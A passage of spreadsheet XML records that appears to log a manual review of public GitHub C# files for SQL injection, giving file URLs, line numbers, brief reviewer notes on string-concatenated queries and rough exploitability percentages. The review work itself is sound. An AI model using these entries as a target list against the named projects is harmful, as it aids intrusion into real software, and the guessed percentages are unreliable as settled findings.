    <s v="A function argument is interpolated into the sql"/>
    <s v="25_x000a_%"/>
    <n v="20"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Sten435/EindOpdracht-Programmeren-Gevorderd/raw/b0973d373f0ed3613c24453ed891d8ed9a388f71/Code/Persistentie/Mappers/KlantenMapper.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/minz1337/DoAn/raw/23fc71a464d9a2c0de016e95d3b82b3a8a2b6364/Program.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Las-Technology/Caixa-Facil/raw/7bd8b454abe0743292f65748661a54671feeee77/FrmRetiraDinheiroCaixa.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/thaiduong25101990/PaymentGateway/raw/1c57817842710e17a9ca9bc1414203afd30aeacd/PaymentGateway/Tags/3.1.0/BR_Services/BRIBPS_Maintaince/clsProcessMaintaince.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/fatmakurtulus/sinema-site/raw/928785af820846a4594ed7bb8503ce7f3a19db41/sinema/sinemabilet(dogru)/sinemabilet/Form4.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/saluton-mundo/Ammo/raw/a76213e2833722e1c3acdaf3512017fae85a477a/Ammo.Domain/Repositories/Concrete/BulletCollectionBulletRepository.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/FathiSulieman/ASP.Net-ilcapo-website/raw/c19f688d092b8a3befbb2047fb749fa907cc57d9/Webforms/display_order.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/daniel-wolfson/Net.Core-4Cast-example/raw/82ff1c33575cbae98f4af6bb2f3e3a7ee9abc36b/Services/CacheService.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-16T00:00:00"/>
    <s v="https://github.com/joeywda/Srvtools/raw/e1e7fb954894d78772bfb4aa1aec53d51a3b0aba/LogSQLBuilder.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="135"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Variables are concatenated into the sql statement in place of the table and column names. These variables are generated through &quot;builder&quot; functions, so some amount of control/sanitization seems likely"/>
    <s v="10_x000a_%"/>
    <n v="15"/>
    <s v="99.6% c#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/thinkwho/TE-Trades/raw/9c9ff5e825ab602ded15b9161f47964a24db0b5b/dotnet/Capstone/DAO/TradeSqlDao.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-16T00:00:00"/>
    <s v="https://github.com/sajjucode/programmermate/raw/668733b2b3e9cb3164674c86d18ccdffc5fb6563/Pss.ProgrammerMate.DAL/ProjectMethodsDAL.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="329"/>
    <x v="2"/>
    <s v="No"/>
    <s v="The getList function concatenates its OrderBy parameter into the sql, but this parameter is hardcoded in all calls to the function"/>
    <s v="0_x000a_%"/>
    <n v="10"/>
    <s v="100% C#. &quot;Programmer mate is a desktop application to help programmer to create auto Store Procedures, Projects , Business Entity , Data Access and Web API in c#.&quot;"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/rumitspkt/QLTTTA-devexpress/raw/43f87701f89e874f9840a62a3613f2b14a46da84/QLTTTA/DAO/KetQuaDAO.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/MABELYNJ05/BASE-DE-DATOS/raw/7d8594b4d7582bc5851f36433ae88259f93592c0/Aplication/Aplication/Conexion/ClsConexion.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-16T00:00:00"/>
    <s v="https://github.com/vikiii22/DesarrolloInterfaces/raw/95dd0bc80338b17bb4a1885c2fe2bbb9e3ba7f9f/WPF/EjerciciosWPF/proyectoFinal/proyectoFinal/proyectoFinal/winLibroLibreria.xaml.cs"/>
    <x v="2"/>
    <x v="3"/>
    <n v="151"/>
    <x v="7"/>
    <s v="No"/>
    <s v="Dead code (ponernombre and poncodigo functions are never called)"/>
    <s v="0_x000a_%"/>
    <n v="30"/>
    <s v="This appears to be a personal repository for a student based on folder names like &quot;FInal project&quot; and &quot;exercise 1&quot;. There are numerous distinct projects in the repo. The proyectoFinal project is a standalone app built with WPF"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/grvraj82/MX-Accountingplus/raw/bcbbbdfcb37b05b79e0287b35d89acc577418255/MXAccountingEA/Mfp/PinLogOn.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-16T00:00:00"/>
    <s v="https://github.com/brendachongg/ACI/raw/d26a77c53fd50f2b3888e78bec7091d141a7ad6f/ACITMS/ACI_TMS/App_Data/Data/DB_Batch_Session.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="237"/>
    <x v="5"/>
    <s v="Did not install"/>
    <s v="Some of the functions in this file concatenate arguments for where clauses. However, in the invocations of these functions, the arguments are usually hardcoded or come from a preexisting entry in the DB. Second order injection might be possible"/>
    <s v="5_x000a_%"/>
    <n v="30"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/yovannychiquiza/CareerCloud/raw/1b19598a5d6b31df10bd68f58fa379ee1d931812/CareerCloud.ADODataAccessLayer/ApplicantProfileRepository.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/redpanda321/Mall/raw/5f88c77ce90eaaaf73679ae73f99efa27a7d234e/nopCommerce_4.30/Presentation/Mall.Web/Areas/Web/Controllers/InstallerController.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/SahasPunchihewa/radian-relief-management/raw/8c1d196f17d8a30756540e3f601c128e2dee2056/Relief%20System/Relief.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/dipto33/Bangladesh_Railway_ASP.NET/raw/ecd9a9cba548673a2e22500c061b99ca464b3130/Booking2.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/milan997/POP-SF07-16/raw/8994f4d716ff579f97c647cad52991e94218a76d/POP-SF07-16-GUI/DAL/ProdajaDAO.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-16T00:00:00"/>
    <s v="https://github.com/liankong110/VAN_OA/raw/53b27cc0aa13b99dc16390b6ded2d24f91ed4050/FLY/Dal/JXC/CAI_OrderOutHousesService.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="206"/>
    <x v="5"/>
    <s v="Did not install"/>
    <s v="Two of the functions concatenate a string argument into the sql"/>
    <s v="25_x000a_%"/>
    <n v="30"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/drewgreenwell/playscript-mono/raw/fc5e71ac34ce2af2cc3ca5bfb10a91152d524dfd/mcs/class/System.Data/Test/ProviderTests/System.Data.OleDb.jvm/OleDbType/OleDbType_Date.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Lewishui/HTmail/raw/2dd49e5ef74ddc4332027bb4861431ea8f1d9163/clsBuiness/clsAllnew.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/lucaSchiavon/LS_Varie/raw/e7c3fe09cee9140f33780a267cd63c027f50b7ca/Produzione_re2017_pulito/Prj.Api/ItryRepository/BaseRepository.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/PauloLetro/Projeto-Crud/raw/0166436f69b9d5cfdd11449f372dd08a5a5584ca/ConexaoBD1/Program.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/newiggi32/TechnicalDocumentation/raw/d0a81ede43efb8f586df10f6a1ccc2e45988cc63/TechnicalDocumentation/Windows/wDocumentAdd.xaml.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-16T00:00:00"/>
    <s v="https://github.com/SoftSuite/SHND/raw/9811de3acd382d2e9c9981cc0587c174fa56658f/DAL/Views/VMaterialNutrientDAL.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="128"/>
    <x v="2"/>
    <s v="Did not install"/>
    <s v="Two of the functions concatenate a string argument into the sql order by clause"/>
    <s v="25_x000a_%"/>
    <n v="25"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/phong-ngau0812/Gitcode9-6/raw/f101f9af51f569abefda14c838ce7568d9179f11/DataAccess/Base/FarmGroupCollectionBase.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/annytab/a-webshop/raw/e238ff6b04a66799a16baa03635c1ea570889046/Webshop/Models/Unit.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="433"/>
    <x v="2"/>
    <s v="Did not install"/>
    <s v="Seems very unlikely because the sql statements in this file are parameterized, and the sortOrder and sortField variables are retrieved from the GetValidSortOrder and GetValidSortField functions, respectively"/>
    <s v="5_x000a_%"/>
    <n v="5"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/0x736E/NIST-Juliet-CSharp-1.3/raw/9784bfafa1caee97fa9f7126f26ab266ecf5c386/src/src/testcases/CWE789_Uncontrolled_Mem_Alloc/s01/CWE789_Uncontrolled_Mem_Alloc__Database_HashSet_67a.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/chance20/test/raw/360da32345b83f8c5a04fafe8fec0510ca5dd81b/Dao/dUtilisateurs.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/sessionliang/os/raw/cf8fa4ea87c5bd23f5eb25ed3600ce63168af29e/ss/SiteServer.CMS/Provider/Data/SqlServer/Input/InputClassifyDAO.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/shine7430/SweetesFruits/raw/27f2127a12f8735b57458a34c99044536e47db36/SquirrelPocket/SquirrelPocket/login.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/varManWai/ASP.NET-Ertist_E-Commerce/raw/2340827b6515a36b79a7a60070d0480a69d97fab/Artist/AddGallery.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/xiaoqingyao/website/raw/cf783ad26974e422a4f8b1f33133be73c147030c/06jiatinglicai/invest/Detail.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/leducmanhimk/QLLTCB/raw/9e6a3ff716479f5b303cb46af44a07be5c9c1eef/QLLTCB/Form/fmQLAdmin.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/muthu0101/openvss/raw/3b5a44a6ebe5450835016a141c5a7dcf027f53c4/VsSrc/VsUtils/MySQL/mysql-connector-net-5.2.3-src/MySql.VisualStudio/Commands/DropCommand.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/steffenhorlbeck/VehicleGrabber/raw/38243d0f231f972e136fbde1ea53e62036c07ff7/VehicleGrabberCore/Importer/ADACImportCarDetails.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/PattemRajkumar/KVTPWEB/raw/4f0761fa63c23338d5e339acb4f88efad7fd57a4/KVTPWEB/App_Code/mydb.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ThanhSon1506/quanlythuvien/raw/4ef4d2bce8388cc484cc40022d408dd72c3db88d/do_an_wind_V1.3_add-btnKhoiPhuc-and-decentralization%20(1)/do_an_wind_V1.1_add-btnKhoiPhuc-and-decentralization/do_an_wind/DAL/DAL_tacgia.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/kom449/Discord-Bot-GIT/raw/1aa049c86205a70fad986413f2f31818a620044d/Modules/League_Commands/rank.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/yiershan/DonetSpider/raw/436eb3e23b871ffb09f6d6c36f722e87b3cbfdd3/src/SqliteWriter/SqliteWriter.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="67"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Exploitable if function parameter is not sanitized"/>
    <s v="25_x000a_%"/>
    <n v="10"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/jewandara/Maxford_Project/raw/84ec64b963bdb230f6196383de4f29a77a11d46c/Projet_Max/MAXFORD/Account/Teacher/Event/Edit.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/gabrielleandrof/TesteSowConnect/raw/303a239c416fffba0b2acd8e064f0b052c457a4b/SowConnect/Services/SowConnect.API/Domain/Data/ClienteDal.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/AshidaFaisal/qbiztro_restaurant/raw/cf4cd7c84e2d51dbc33377e603fd71e04fac7e38/INDIAN/Code/BisCarePosEdition/MyClass.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="117"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Exploitable if function parameters are not sanitized"/>
    <s v="25_x000a_%"/>
    <n v="10"/>
    <s v="100% C#"/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/yidane/51wine/raw/06406affdbcc489b49d412c1ef7a3423007d2564/WeiXinPF.DAL/ucard/wx_ucard_ticket.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="346"/>
    <x v="2"/>
    <s v="Did not install"/>
    <s v="Exploitable if orderBy parameter is not sanitized"/>
    <s v="25_x000a_%"/>
    <n v="15"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/365089264/ThomRe/raw/4ee785ebe849f879be7962fcc812809770fe393c/ims_sync/CNE.Scheduler/Extension/NewListBond.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/1824801030209/RestaurentManager/raw/6ebc78d75cafc4b7a5c1c6ea6340bec7fdd14025/QuanLyNhaHang/QuanLyNHAHANG/QuanLyNHAHANG/BUS/clsBan.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/manuel-martin3/desarrollo/raw/0eac2431f3b7a70999586064466fe0c9307138f0/LayerDataAccess/tb_cp_comercialcoloresDA.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/justasabc/wifi/raw/5af2dd00aab7676d82429d7160af5927cec13173/OpenSim/Data/Tests/BasicDataServiceTest.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/gilgru23/projects/raw/8f9e330af457eeabda1bbea54ebbea19a139880b/KanbanBoard/KanbanSolution/KanbanProject/DataAccessLayer/BoardHandler.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/sertugkaptan/DB/raw/4a7b40189b4e3aa9252705a0d00fddc6eb42af7e/Database/AddStudentScreen.cs"/>
    <x v="2"/>
    <x v="3"/>
    <n v="106"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Vulnerable if functions args are not sanitized"/>
    <s v="25_x000a_%"/>
    <n v="10"/>
    <s v="100% c#. The last commit's comment is &quot;Term Project Done&quot;"/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/antgraf/Embedded-DB-.Net-Performance-Test/raw/63957da3de03b859f298dd3a7d15559532e3cd2f/EmbeddedDbDotNetTest/EmbeddedDbDotNetTest/SqlLiteNet/SQLite.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="238"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Function parameter might not be sanitized however it is of type TableMapping (and not string), so it seems less likely to be vulnerable"/>
    <s v="10_x000a_%"/>
    <n v="15"/>
    <s v="100% C#"/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/ramyothman/Qiyas/raw/f0f4bcaed99f275f80040f266c2f9236fe6d8e62/Source/EventoNew/DataAccessLayer/DataAccessComponents/Conference/EmailTemplateDAC.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="73"/>
    <x v="5"/>
    <s v="Did not install"/>
    <s v="Depends if the where parameter in the GetAllEmailTemplate function is sanitized"/>
    <s v="25_x000a_%"/>
    <n v="30"/>
    <s v="Many many compiler errors"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/kitanz/AAServer.1.2.14_Xili/raw/f98d6e63a5241dc7a7978fc1953fdafd5f0acb6d/ArcheAge/ArcheAge/Holders/CharacterHolder.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-09T00:00:00"/>
    <s v="https://github.com/printf-dj/Alpha/raw/78f4305a06177b23a87f3f5082437cf0ca8bcc69/Alpha%20Rebranded/s_librarycheck.aspx.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="33"/>
    <x v="3"/>
    <s v="No"/>
    <s v="All the input fields in the regisration page are sanitized using regex, so nothing can be injected"/>
    <n v="0"/>
    <n v="90"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/emperorstarfinder/Opensim2/raw/7ea07a9b4221c20d0b0382916e17edf81c7d46f9/OpenSim/Data/SQLite/SQLiteAssetData.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/johndroper/Exygy/raw/3e61c0049164c171f56cd17d5e1676aa8599a80f/Exygy2/Controllers/ExygyPropertiesController.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/HarisJavedJadoon/LWMS/raw/88b562590a8a034a6382deea07c0a2452f66657c/LWMS/DBContext/GroupDAL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/sokolov-o/SOV/raw/3d3988b67e7804fafbdf88b11255623e59b7018f/Amur-2.1/DataDAL/CurveSeriaRepository.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ramansidhu666/Usha-Kaler/raw/4b43c6f38f147d97f4f69c3553e3edd735f02dd5/Property/Admin/Appointments.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Mohamed-Ahmed-El-Sayed-Mostafa-Hammad/Hospital-management-system/raw/1c311af1f14082ecd9bddf62961f0767c4905132/Hospital%20Management%20System/PatientINFO.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/dances273/Daences/raw/600b04bdfc0023ecdc6959bbef93d2b29386cf48/Kasse/Kasse/Alap.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Kesco-m/Kesco.Lib.Entities/raw/8d896fba88be433e31554ec6183b72349ad128da/Corporate/Voip/PhonePool.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/muhammederem/BookStore/raw/56e17116d726a0be629ad000be7e342556afe23b/BLL/Ki%C5%9Fi/Kullan%C4%B1c%C4%B1.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/monkinone/OrderPrinnt/raw/4d28cefd633e58d39fb24e9f3fae4105a5158950/Backup/DataObject/SendDetailDAO.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/lncslncs/IBM_AR_RECEPTIONIST_UNITY_PUBLIC/raw/e536d799848472f347eb034a2d56a0bb86d6b1b2/Azure/Azure_Webhook_Database_Code/HttpTrigger1/run.csx"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/djatngose/WebEnterprise_COMP1640/raw/3fa4131479c165d5d14542380d5595b9a629daa2/POPForums-13.0.2/PopForums.Data.SqlSingleWebServer/Repositories/AwardDefinitionRepository.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/thedave42/multi-lang-monorepo/raw/620d23cb7af224ff410e6c80a7f98268bf21927a/advanced-security-csharp/WebGoat/App_Code/DB/MySqlDbProvider.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-09T00:00:00"/>
    <s v="https://github.com/130641641/Sql-Server-Sample/raw/d34e1ab5f404bb5b660282e15ecb32033903c3dc/sample/DataAccessLayer/DataBase.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="148"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Both table and column names use function arguments, so injection is possible"/>
    <s v="25_x000a_%"/>
    <n v="15"/>
    <s v="No Program.cs file or other starting point for an application. Lots of files are missing their file extension. This seems like some kind of test project"/>
  </r>
  <r>
    <d v="2023-08-09T00:00:00"/>
    <s v="https://github.com/felwanew/AisBuchung/raw/a782dba22ab322b527ff2c59a19c640c10cd84c6/AisBuchung_Api/Models/DatabaseManager.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="113"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Function argument concatenated to the query, so it depends how the function is used"/>
    <s v="25_x000a_%"/>
    <n v="5"/>
    <s v="100 c#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/mareloraby/GUCera/raw/f965eeb4d6315b773807a545a8de5641d3c8c2a2/GUCera/StudentRegistration.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/pct201/migrationtest/raw/90b377c89811f37ad30cd38600cefc7dca4bbe16/eRims_SonicWeb/App_Code/SONIC_DAL/clsExposure_Alarms.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/victor-wiki/DatabaseManager/raw/8245fb984074649ab7f8bed72a437a8270618eda/DatabaseInterpreter/DatabaseInterpreter.Core/Interpreter/DbInterpreter.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ram1219/StudyWF/raw/6831bda21bcdd414d61d2f37e3c40c32062657a2/WindowForm/02_1.TestDataBase/MemberMngForm.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-09T00:00:00"/>
    <s v="https://github.com/dimitarminchev/ITCareer/raw/8c643c1d4fe5431b778027c8f3fa9a50872f2778/07.%20Software%20Development/2020/7.%20Databases/MiniORM/DatabaseConnection.cs"/>
    <x v="2"/>
    <x v="4"/>
    <n v="50"/>
    <x v="9"/>
    <s v="Did not install"/>
    <s v="Depends how the functions is used"/>
    <s v="25_x000a_%"/>
    <n v="40"/>
    <s v="&quot;Electronic repository with learning materials, tasks and solutions under the national program &quot;Training for IT skills and career&quot; of the Ministry of Education and Science (MES) for acquiring the profession of Applied programmer.&quot; (google translation of the README)"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/yushuhsiao/tengbo/raw/f6e32cec198acb4a51e4d5339d25bee1c3379ad5/Library/api/webAPI/subacc/MemberGameRow_BBIN.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
